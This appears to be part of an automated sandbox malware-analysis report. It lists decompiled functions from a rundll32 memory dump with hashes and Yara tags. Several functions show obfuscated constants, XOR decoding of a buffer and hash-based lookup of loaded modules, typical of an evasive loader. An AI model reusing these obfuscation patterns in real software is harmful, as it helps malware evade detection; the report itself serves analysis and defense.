                                                                      Function 0200CF31, Relevance: 1.3, Strings: 1, Instructions: 87COMMONCrypto
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 84%
                                                                      			E0200CF31(void* __ecx, void* __edx, void* __eflags) {
				void* _t35;
				signed int _t39;
				unsigned int* _t51;
				signed int _t52;
				signed int _t54;
				signed int _t59;
				unsigned int _t60;
				unsigned int _t61;
				unsigned int* _t65;
				signed int* _t67;
				signed int* _t68;
				signed int* _t69;
				unsigned int _t71;
				void* _t77;
				void* _t79;
				void* _t81;
				void* _t82;

				_t69 =  *(_t81 + 0x2c);
				_push(_t69);
				_push( *((intOrPtr*)(_t81 + 0x30)));
				_push(__edx);
				E02002550(_t35);
				 *((intOrPtr*)(_t81 + 0x28)) = 0x2f20f4;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				 *(_t81 + 0x1c) = 0xdb93;
				_t67 =  &(_t69[1]);
				 *(_t81 + 0x1c) =  *(_t81 + 0x1c) ^ 0xcf590e5f;
				 *(_t81 + 0x1c) =  *(_t81 + 0x1c) ^ 0xcf59d9ad;
				 *(_t81 + 0x40) = 0x4aee;
				 *(_t81 + 0x40) =  *(_t81 + 0x40) >> 0xd;
				 *(_t81 + 0x40) =  *(_t81 + 0x40) >> 0xb;
				 *(_t81 + 0x40) =  *(_t81 + 0x40) ^ 0x00002cea;
				_t54 =  *_t69;
				_t68 =  &(_t67[1]);
				_t39 =  *_t67 ^ _t54;
				 *(_t81 + 0x20) = _t54;
				 *(_t81 + 0x24) = _t39;
				_t20 = _t39 + 1; // 0x1
				_t71 =  !=  ? (_t20 & 0xfffffffc) + 4 : _t20;
				_t82 = _t81 + 0xc;
				_t51 = E01FF54FB(_t71);
				 *(_t82 + 0x34) = _t51;
				if(_t51 != 0) {
					_t79 = 0;
					_t65 = _t51;
					_t77 =  >  ? 0 :  &(_t68[_t71 >> 2]) - _t68 + 3 >> 2;
					if(_t77 != 0) {
						_t52 =  *(_t82 + 0x14);
						do {
							_t59 =  *_t68;
							_t68 =  &(_t68[1]);
							_t60 = _t59 ^ _t52;
							 *_t65 = _t60;
							_t65 =  &(_t65[1]);
							_t61 = _t60 >> 0x10;
							 *((char*)(_t65 - 3)) = _t60 >> 8;
							 *(_t65 - 2) = _t61;
							_t79 = _t79 + 1;
							 *((char*)(_t65 - 1)) = _t61 >> 8;
						} while (_t79 < _t77);
						_t51 =  *(_t82 + 0x34);
					}
					 *((char*)(_t51 +  *((intOrPtr*)(_t82 + 0x18)))) = 0;
				}
				return _t51;
			}




















                                                                      0x0200cf36
                                                                      0x0200cf3b
                                                                      0x0200cf3c
                                                                      0x0200cf40
                                                                      0x0200cf42
                                                                      0x0200cf49
                                                                      0x0200cf55
                                                                      0x0200cf56
                                                                      0x0200cf57
                                                                      0x0200cf58
                                                                      0x0200cf60
                                                                      0x0200cf63
                                                                      0x0200cf6b
                                                                      0x0200cf73
                                                                      0x0200cf7b
                                                                      0x0200cf80
                                                                      0x0200cf85
                                                                      0x0200cf8d
                                                                      0x0200cf91
                                                                      0x0200cf94
                                                                      0x0200cf96
                                                                      0x0200cf9a
                                                                      0x0200cf9e
                                                                      0x0200cfae
                                                                      0x0200cfb9
                                                                      0x0200cfc3
                                                                      0x0200cfc5
                                                                      0x0200cfcc
                                                                      0x0200cfd4
                                                                      0x0200cfd6
                                                                      0x0200cfe7
                                                                      0x0200cfec
                                                                      0x0200cfee
                                                                      0x0200cff2
                                                                      0x0200cff2
                                                                      0x0200cff4
                                                                      0x0200cff7
                                                                      0x0200cff9
                                                                      0x0200d000
                                                                      0x0200d003
                                                                      0x0200d006
                                                                      0x0200d009
                                                                      0x0200d00f
                                                                      0x0200d010
                                                                      0x0200d013
                                                                      0x0200d017
                                                                      0x0200d017
                                                                      0x0200d020
                                                                      0x0200d020
                                                                      0x0200d02c

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: ,
                                                                      • API String ID: 0-48859977
                                                                      • Opcode ID: 5ce2485613cba5a6437e7217406bc29238c0f0aad0300714a2d7ecf3c9a30912
                                                                      • Instruction ID: b5598cd58902d972aa761d5cc5ef37b9c692ad9ed19713d8fa8edac6217a9eaa
                                                                      • Opcode Fuzzy Hash: 5ce2485613cba5a6437e7217406bc29238c0f0aad0300714a2d7ecf3c9a30912
                                                                      • Instruction Fuzzy Hash: 8231AB32A097518FE315CF2CC88555BFBE0EF99704F054A6DEA8997341C771E90ACB92
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0024C4A5, Relevance: 1.3, Strings: 1, Instructions: 87COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: ,
                                                                      • API String ID: 0-48859977
                                                                      • Opcode ID: b7babf8be26eab1100141104debef1777e84d1ab42b81237bf176bb25377396b
                                                                      • Instruction ID: 95bc406f6b5952ab464dfe453b8abb720b319dee620eb3824a919531edcf88fb
                                                                      • Opcode Fuzzy Hash: b7babf8be26eab1100141104debef1777e84d1ab42b81237bf176bb25377396b
                                                                      • Instruction Fuzzy Hash: 5F319C326193518FD318DF2CC48155BFBE0EF98704F454A6DEA85A7301D770EA0ACB92
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0023498C, Relevance: 1.3, Strings: 1, Instructions: 70COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: YQ
                                                                      • API String ID: 0-919377280
                                                                      • Opcode ID: 832c9db957fb198b4f060a0ba3ba27daba2b91c64806fc125af17a29fa887a50
                                                                      • Instruction ID: 2ff5d46927c8a0ec1a4ed6ea244db99ac7d93875dfa79e5c723b30fcf407b2ae
                                                                      • Opcode Fuzzy Hash: 832c9db957fb198b4f060a0ba3ba27daba2b91c64806fc125af17a29fa887a50
                                                                      • Instruction Fuzzy Hash: D3213572D0021DEBDF05DFE5D80A9DFBBB2EB84704F108099E914A7250C7BA5A64DF80
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 02000223, Relevance: 1.3, Strings: 1, Instructions: 68COMMONCrypto
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 100%
                                                                      			E02000223(intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _t69;
				signed int _t73;
				intOrPtr* _t79;
				intOrPtr* _t80;
				void* _t81;

				_v32 = _v32 & 0x00000000;
				_v40 = 0x1d1d13;
				_v36 = 0x222c2b;
				_v20 = 0x8e6b;
				_v20 = _v20 >> 1;
				_v20 = _v20 << 6;
				_v20 = _v20 ^ 0x0011cb3d;
				_v16 = 0xc711;
				_v16 = _v16 >> 0xa;
				_t73 = 0xe;
				_v16 = _v16 * 0x46;
				_v16 = _v16 ^ 0x000025d9;
				_v12 = 0x5a6f;
				_v12 = _v12 >> 0xe;
				_v12 = _v12 << 0x10;
				_v12 = _v12 * 0x7c;
				_v12 = _v12 ^ 0x007c57cb;
				_v24 = 0xc850;
				_v24 = _v24 | 0x7c4bf75d;
				_v24 = _v24 ^ 0x7c4b9b6b;
				_v28 = 0x7391;
				_v28 = _v28 + 0x5592;
				_v28 = _v28 ^ 0x0000ce0e;
				_v8 = 0x1617;
				_v8 = _v8 / _t73;
				_v8 = _v8 >> 0xb;
				_v8 = _v8 * 0x60;
				_v8 = _v8 ^ 0x00003b9a;
				_t79 =  *((intOrPtr*)(E01FF3278() + 0xc)) + 0xc;
				_t80 =  *_t79;
				while(_t80 != _t79) {
					_t58 = _t80 + 0x30; // 0xfef84d81
					_t69 = E01FF165C( *_t58, _v12, _v24, _v28, _v8);
					_t81 = _t81 + 0xc;
					if((_t69 ^ 0x1f8fefc1) == _a4) {
						_t60 = _t80 + 0x18; // 0xe845c718
						return  *_t60;
					}
					_t80 =  *_t80;
				}
				return 0;
			}

















                                                                      0x02000229
                                                                      0x0200022f
                                                                      0x02000236
                                                                      0x0200023d
                                                                      0x02000244
                                                                      0x02000247
                                                                      0x0200024b
                                                                      0x02000252
                                                                      0x02000259
                                                                      0x02000265
                                                                      0x02000266
                                                                      0x02000269
                                                                      0x02000270
                                                                      0x02000277
                                                                      0x0200027b
                                                                      0x02000283
                                                                      0x02000286
                                                                      0x0200028d
                                                                      0x02000294
                                                                      0x0200029b
                                                                      0x020002a2
                                                                      0x020002a9
                                                                      0x020002b0
                                                                      0x020002b7
                                                                      0x020002c3
                                                                      0x020002c6
                                                                      0x020002ce
                                                                      0x020002d1
                                                                      0x020002e6
                                                                      0x020002e9
                                                                      0x02000310
                                                                      0x020002f9
                                                                      0x020002fc
                                                                      0x02000306
                                                                      0x0200030c
                                                                      0x0200031c
                                                                      0x00000000
                                                                      0x0200031c
                                                                      0x0200030e
                                                                      0x0200030e
                                                                      0x00000000

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: +,"
                                                                      • API String ID: 0-654858841
                                                                      • Opcode ID: 36948431c4fa179cd8bab93fa242a1fc78fd0d12126f49712600092e518b7711
                                                                      • Instruction ID: e42703cada249f5d132eb0aa4741175f11764e6f80e08880b6c8871f23f32ba5
                                                                      • Opcode Fuzzy Hash: 36948431c4fa179cd8bab93fa242a1fc78fd0d12126f49712600092e518b7711
                                                                      • Instruction Fuzzy Hash: A3312271D04609EBEB04CFA5C98A99EFBB1FB44314F208599C516B7290D3B46B84DF84
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0023D3F5, Relevance: 1.3, Strings: 1, Instructions: 60COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: %<
                                                                      • API String ID: 0-2252717727
                                                                      • Opcode ID: d0c9b719ae2acfba52d1ca39c39c417e0af17c540289deb21c027bbdd74d7c36
                                                                      • Instruction ID: 72c33dc5a6ab519386dc24a022420ef7960236451ddd1b93c7c45d62cc9be5b7
                                                                      • Opcode Fuzzy Hash: d0c9b719ae2acfba52d1ca39c39c417e0af17c540289deb21c027bbdd74d7c36
                                                                      • Instruction Fuzzy Hash: BB21F2B5C0131DEBEB48DFA6C90A5AEBFB4EB00318F108498D425B6290D3B84B14DF92
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 020009B8, Relevance: 1.3, Strings: 1, Instructions: 59COMMONCrypto
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 79%
                                                                      			E020009B8(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _t54;
				signed int _t62;
				signed int _t63;

				_push(_a12);
				_push(_a8);
				_push(0);
				_push(__edx);
				_push(__ecx);
				_t54 = E02002550(0);
				_v28 = _t54;
				_v24 = _t54;
				_v32 = 0x34e779;
				_v20 = 0xed53;
				_v20 = _v20 >> 2;
				_v20 = _v20 << 6;
				_v20 = _v20 ^ 0x000ef232;
				_v16 = 0x8c43;
				_t62 = 0x6e;
				_v16 = _v16 * 0x16;
				_t63 = 0x43;
				_v16 = _v16 / _t62;
				_v16 = _v16 | 0xa5153760;
				_v16 = _v16 ^ 0xa5150d1d;
				_v12 = 0x71b1;
				_v12 = _v12 | 0x28689702;
				_v12 = _v12 ^ 0x24ff525f;
				_v12 = _v12 ^ 0x99266ed7;
				_v12 = _v12 ^ 0x95b1ff33;
				_v8 = 0x9915;
				_v8 = _v8 >> 0xb;
				_v8 = _v8 / _t63;
				_v8 = _v8 >> 8;
				_v8 = _v8 ^ 0x0000698b;
				return E0200E232(_v20, _v16, __edx, _a12, _v12, _t63, _v8);
			}













                                                                      0x020009bf
                                                                      0x020009c6
                                                                      0x020009c9
                                                                      0x020009ca
                                                                      0x020009cb
                                                                      0x020009cc
                                                                      0x020009d1
                                                                      0x020009d7
                                                                      0x020009dc
                                                                      0x020009e3
                                                                      0x020009ea
                                                                      0x020009ee
                                                                      0x020009f2
                                                                      0x020009f9
                                                                      0x02000a06
                                                                      0x02000a09
                                                                      0x02000a11
                                                                      0x02000a12
                                                                      0x02000a17
                                                                      0x02000a1e
                                                                      0x02000a25
                                                                      0x02000a2c
                                                                      0x02000a33
                                                                      0x02000a3a
                                                                      0x02000a41
                                                                      0x02000a48
                                                                      0x02000a4f
                                                                      0x02000a58
                                                                      0x02000a5b
                                                                      0x02000a5f
                                                                      0x02000a83

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: y4
                                                                      • API String ID: 0-35764640
                                                                      • Opcode ID: 85987d0af05f291c1bba09fd4deff99604705c1734ec6e85378ee402cbfd5748
                                                                      • Instruction ID: ad89ed099a4cf87c504ff50c56a105c9755625239e5fd656351dd5015f73be11
                                                                      • Opcode Fuzzy Hash: 85987d0af05f291c1bba09fd4deff99604705c1734ec6e85378ee402cbfd5748
                                                                      • Instruction Fuzzy Hash: 242112B1D01219EBEB08DFE9C84A8DEBBB1FB44300F108199E525A62A0D7B95751DF90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0023FF2C, Relevance: 1.3, Strings: 1, Instructions: 59COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: y4
                                                                      • API String ID: 0-35764640
                                                                      • Opcode ID: b78e4ec7b0daa4de19488d10b39de6a407231f003e24876a1e2b7fd591ae7ca5
                                                                      • Instruction ID: e8d9411d7548e107a3edc76daa185944869da5a9bc4a1225097a1609e22d0293
                                                                      • Opcode Fuzzy Hash: b78e4ec7b0daa4de19488d10b39de6a407231f003e24876a1e2b7fd591ae7ca5
                                                                      • Instruction Fuzzy Hash: 442123B1D0121DEBDB08DFE5C84A8DEBBB1FB40300F108199E525A7250D7B95760DF90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 02031E14, Relevance: .4, Instructions: 405COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088761508.0000000002013000.00000020.00020000.sdmp, Offset: 02013000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_2013000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 4a7f7724cf0b10ca78a4658c02a8dd5148ac5505d2730641fde13766f96e672f
                                                                      • Instruction ID: c3b13b202ae27bf9aff51685c78fed5288aab28b8a7e6c9e45a60d2912e0fb21
                                                                      • Opcode Fuzzy Hash: 4a7f7724cf0b10ca78a4658c02a8dd5148ac5505d2730641fde13766f96e672f
                                                                      • Instruction Fuzzy Hash: 61E11474A0030A9FDB12EFA9C88099EF7FAFF48704B1585A5E905A7621DB34ED41EF50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0202303C, Relevance: .3, Instructions: 284COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088761508.0000000002013000.00000020.00020000.sdmp, Offset: 02013000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_2013000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 313ad05e5e01ffd17308f42d0f644463b69bf9ddbb935858998f0578b7221ae5
                                                                      • Instruction ID: 34cf851c62d9b84502eaa82827d149f8d86cd033138ef40f9c4ad6250dab79a3
                                                                      • Opcode Fuzzy Hash: 313ad05e5e01ffd17308f42d0f644463b69bf9ddbb935858998f0578b7221ae5
                                                                      • Instruction Fuzzy Hash: E4B18034B00354AFDB16DF68C995AAEB3F6EF49300F5544E6E404AB350CB39AE48EB10
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 01FFE612, Relevance: .2, Instructions: 226COMMONCrypto
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 100%
                                                                      			E01FFE612() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				unsigned int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				char _v92;
				signed int _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				signed int _t219;
				short _t230;
				short _t232;
				void* _t237;
				void* _t238;
				void* _t258;
				short* _t259;
				void* _t260;
				short* _t261;
				short* _t262;
				signed int _t263;
				signed int _t264;
				signed int _t265;
				signed int _t266;
				signed int _t267;
				signed int _t268;
				signed int _t269;
				void* _t270;

				_v96 = _v96 & 0x00000000;
				_v108 = 0x4935a9;
				_t238 = 0x2385cbc3;
				_v104 = 0x1767a9;
				_v100 = 0x71ae0c;
				_v20 = 0x2668;
				_t258 =  *0x2011088 + 0x38;
				_v20 = _v20 | 0x7ba2ed9b;
				_v20 = _v20 + 0xffff3c7d;
				_v20 = _v20 + 0xffff231c;
				_v20 = _v20 ^ 0x7ba17e9e;
				_v56 = 0xe8af;
				_v56 = _v56 + 0xfa0e;
				_v56 = _v56 ^ 0x9e111eab;
				_v56 = _v56 ^ 0x9e10e373;
				_v24 = 0x871c;
				_v24 = _v24 << 0xf;
				_v24 = _v24 >> 4;
				_v24 = _v24 + 0xffffba2c;
				_v24 = _v24 ^ 0x0438e224;
				_v60 = 0x90d6;
				_v60 = _v60 | 0xb72a7a32;
				_v60 = _v60 + 0xffff6a8c;
				_v60 = _v60 ^ 0xb72a6d3a;
				_v84 = 0xc38;
				_v84 = _v84 | 0xf14ca8d2;
				_v84 = _v84 ^ 0xf14c81a8;
				_v80 = 0x2669;
				_t263 = 0x64;
				_v80 = _v80 / _t263;
				_v80 = _v80 ^ 0x0000244e;
				_v76 = 0xca1e;
				_t264 = 0x22;
				_v76 = _v76 / _t264;
				_v76 = _v76 ^ 0x000038d6;
				_v68 = 0x7bb5;
				_v68 = _v68 | 0x2bfa8cc8;
				_v68 = _v68 + 0xffff7471;
				_v68 = _v68 ^ 0x2bfa6fbb;
				_v32 = 0xfcd5;
				_v32 = _v32 >> 0xf;
				_v32 = _v32 ^ 0x2150d801;
				_v32 = _v32 >> 0xa;
				_v32 = _v32 ^ 0x000853df;
				_v28 = 0xef37;
				_v28 = _v28 ^ 0x5be54c03;
				_v28 = _v28 | 0x52b36e66;
				_v28 = _v28 + 0x9a0c;
				_v28 = _v28 ^ 0x5bf8fb3a;
				_v64 = 0xdcca;
				_v64 = _v64 + 0xd7f5;
				_v64 = _v64 >> 8;
				_v64 = _v64 ^ 0x000070b2;
				_v72 = 0xbeda;
				_t265 = 0x5d;
				_v72 = _v72 * 0x2c;
				_v72 = _v72 ^ 0x0020a7ce;
				_v8 = 0xad8b;
				_v8 = _v8 ^ 0x0a8bb6d2;
				_v8 = _v8 * 0x1a;
				_v8 = _v8 << 0xc;
				_v8 = _v8 ^ 0x0c70cf11;
				_v16 = 0xcb7;
				_v16 = _v16 / _t265;
				_t266 = 0x25;
				_v16 = _v16 / _t266;
				_v16 = _v16 + 0xffff7a88;
				_v16 = _v16 ^ 0xffff53c8;
				_v52 = 0x513d;
				_v52 = _v52 | 0x7fbc6d9f;
				_v52 = _v52 ^ 0x7fbc6fd5;
				_v12 = 0xd2d6;
				_v12 = _v12 + 0xec15;
				_v12 = _v12 | 0xf7fef9de;
				_v12 = _v12 ^ 0xf7ffcc6d;
				_v48 = 0x3b6f;
				_v48 = _v48 + 0xffff5d9c;
				_v48 = _v48 + 0xffff2e60;
				_v48 = _v48 ^ 0xfffe9d66;
				_v44 = 0xd292;
				_v44 = _v44 + 0x28de;
				_t219 = _v44;
				_t267 = 0x15;
				_t252 = _t219 % _t267;
				_v44 = _t219 / _t267;
				_t237 = 2;
				_v44 = _v44 * 0x6d;
				_v44 = _v44 ^ 0x000550f8;
				_v40 = 0x4184;
				_v40 = _v40 * 0x2c;
				_v40 = _v40 + 0xa5cf;
				_v40 = _v40 << 0xa;
				_v40 = _v40 ^ 0x2fa1cfd8;
				_v88 = 0x2b12;
				_v88 = _v88 + 0xffff5308;
				_v88 = _v88 ^ 0xffff15a9;
				_v36 = 0x98e2;
				_v36 = _v36 >> 2;
				_v36 = _v36 + 0xffffa9a0;
				_v36 = _v36 | 0xdd3f0fc1;
				_v36 = _v36 ^ 0xffff9d62;
				do {
					while(_t238 != 0x135586c5) {
						if(_t238 == 0x1d3b4bfc) {
							_t268 = E01FFDF8A(_t238, _t252, __eflags, 0x10, 4);
							E02009A27( &_v92, _t237, _v60, 1, _t258, _v84, _v80, _v76);
							_t260 = _t258 + _t237;
							_t252 = 1;
							E02009A27( &_v92, 1, _v68, _t268, _t260, _v32, _v28, _v64);
							_t270 = _t270 + 0x38;
							_t261 = _t260 + _t268 * 2;
							_t238 = 0x35eda080;
							_t230 = 0x5c;
							 *_t261 = _t230;
							_t258 = _t261 + _t237;
							continue;
						} else {
							if(_t238 == 0x2385cbc3) {
								_t232 = E01FFA156();
								_v92 = _t232;
								_t238 = 0x1d3b4bfc;
								continue;
							} else {
								_t275 = _t238 - 0x35eda080;
								if(_t238 == 0x35eda080) {
									_t269 = E01FFDF8A(_t238, _t252, _t275, 0x10, 4);
									_t252 = 1;
									E02009A27( &_v92, 1, _v16, _t269, _t258, _v52, _v12, _v48);
									_t270 = _t270 + 0x20;
									_t262 = _t258 + _t269 * 2;
									_t238 = 0x135586c5;
									_t232 = 0x2e;
									 *_t262 = _t232;
									_t258 = _t262 + _t237;
									continue;
								}
							}
						}
						goto L9;
					}
					_t252 = 1;
					E02009A27( &_v92, 1, _v44, 3, _t258, _v40, _v88, _v36);
					_t259 = _t258 + 6;
					_t270 = _t270 + 0x18;
					_t238 = 0x18dc1a34;
					 *_t259 = 0;
					_t258 = _t259 + _t237;
					__eflags = _t258;
					L9:
					__eflags = _t238 - 0x18dc1a34;
				} while (__eflags != 0);
				return _t232;
			}















































                                                                      0x01ffe618
                                                                      0x01ffe61e
                                                                      0x01ffe625
                                                                      0x01ffe62a
                                                                      0x01ffe631
                                                                      0x01ffe641
                                                                      0x01ffe648
                                                                      0x01ffe64b
                                                                      0x01ffe652
                                                                      0x01ffe659
                                                                      0x01ffe660
                                                                      0x01ffe667
                                                                      0x01ffe66e
                                                                      0x01ffe675
                                                                      0x01ffe67c
                                                                      0x01ffe683
                                                                      0x01ffe68a
                                                                      0x01ffe68e
                                                                      0x01ffe692
                                                                      0x01ffe699
                                                                      0x01ffe6a0
                                                                      0x01ffe6a7
                                                                      0x01ffe6ae
                                                                      0x01ffe6b5
                                                                      0x01ffe6bc
                                                                      0x01ffe6c3
                                                                      0x01ffe6ca
                                                                      0x01ffe6d1
                                                                      0x01ffe6dd
                                                                      0x01ffe6e2
                                                                      0x01ffe6e7
                                                                      0x01ffe6ee
                                                                      0x01ffe6f8
                                                                      0x01ffe6fd
                                                                      0x01ffe702
                                                                      0x01ffe709
                                                                      0x01ffe710
                                                                      0x01ffe717
                                                                      0x01ffe71e
                                                                      0x01ffe725
                                                                      0x01ffe72c
                                                                      0x01ffe730
                                                                      0x01ffe737
                                                                      0x01ffe73b
                                                                      0x01ffe742
                                                                      0x01ffe749
                                                                      0x01ffe750
                                                                      0x01ffe757
                                                                      0x01ffe75e
                                                                      0x01ffe765
                                                                      0x01ffe76c
                                                                      0x01ffe773
                                                                      0x01ffe777
                                                                      0x01ffe77e
                                                                      0x01ffe789
                                                                      0x01ffe78a
                                                                      0x01ffe78d
                                                                      0x01ffe794
                                                                      0x01ffe79b
                                                                      0x01ffe7a6
                                                                      0x01ffe7a9
                                                                      0x01ffe7ad
                                                                      0x01ffe7b4
                                                                      0x01ffe7c0
                                                                      0x01ffe7ca
                                                                      0x01ffe7cf
                                                                      0x01ffe7d4
                                                                      0x01ffe7db
                                                                      0x01ffe7e2
                                                                      0x01ffe7e9
                                                                      0x01ffe7f0
                                                                      0x01ffe7f7
                                                                      0x01ffe7fe
                                                                      0x01ffe805
                                                                      0x01ffe80c
                                                                      0x01ffe813
                                                                      0x01ffe81a
                                                                      0x01ffe821
                                                                      0x01ffe828
                                                                      0x01ffe82f
                                                                      0x01ffe836
                                                                      0x01ffe83d
                                                                      0x01ffe840
                                                                      0x01ffe841
                                                                      0x01ffe845
                                                                      0x01ffe84c
                                                                      0x01ffe84d
                                                                      0x01ffe850
                                                                      0x01ffe857
                                                                      0x01ffe862
                                                                      0x01ffe865
                                                                      0x01ffe86c
                                                                      0x01ffe870
                                                                      0x01ffe877
                                                                      0x01ffe87e
                                                                      0x01ffe885
                                                                      0x01ffe88c
                                                                      0x01ffe893
                                                                      0x01ffe897
                                                                      0x01ffe89e
                                                                      0x01ffe8a5
                                                                      0x01ffe8ac
                                                                      0x01ffe8ac
                                                                      0x01ffe8be
                                                                      0x01ffe93f
                                                                      0x01ffe94a
                                                                      0x01ffe952
                                                                      0x01ffe95f
                                                                      0x01ffe965
                                                                      0x01ffe96a
                                                                      0x01ffe96d
                                                                      0x01ffe970
                                                                      0x01ffe977
                                                                      0x01ffe978
                                                                      0x01ffe97b
                                                                      0x00000000
                                                                      0x01ffe8c0
                                                                      0x01ffe8c6
                                                                      0x01ffe916
                                                                      0x01ffe91b
                                                                      0x01ffe91e
                                                                      0x00000000
                                                                      0x01ffe8c8
                                                                      0x01ffe8c8
                                                                      0x01ffe8ce
                                                                      0x01ffe8e6
                                                                      0x01ffe8f3
                                                                      0x01ffe8f9
                                                                      0x01ffe8fe
                                                                      0x01ffe901
                                                                      0x01ffe904
                                                                      0x01ffe90b
                                                                      0x01ffe90c
                                                                      0x01ffe90f
                                                                      0x00000000
                                                                      0x01ffe90f
                                                                      0x01ffe8ce
                                                                      0x01ffe8c6
                                                                      0x00000000
                                                                      0x01ffe8be
                                                                      0x01ffe98d
                                                                      0x01ffe997
                                                                      0x01ffe99c
                                                                      0x01ffe9a1
                                                                      0x01ffe9a4
                                                                      0x01ffe9a9
                                                                      0x01ffe9ac
                                                                      0x01ffe9ac
                                                                      0x01ffe9ae
                                                                      0x01ffe9ae
                                                                      0x01ffe9ae
                                                                      0x01ffe9c0

                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: fc2d789eabe48cdc59d171c9d20727d18d47b5be924bcbca87a47b244e86dfb7
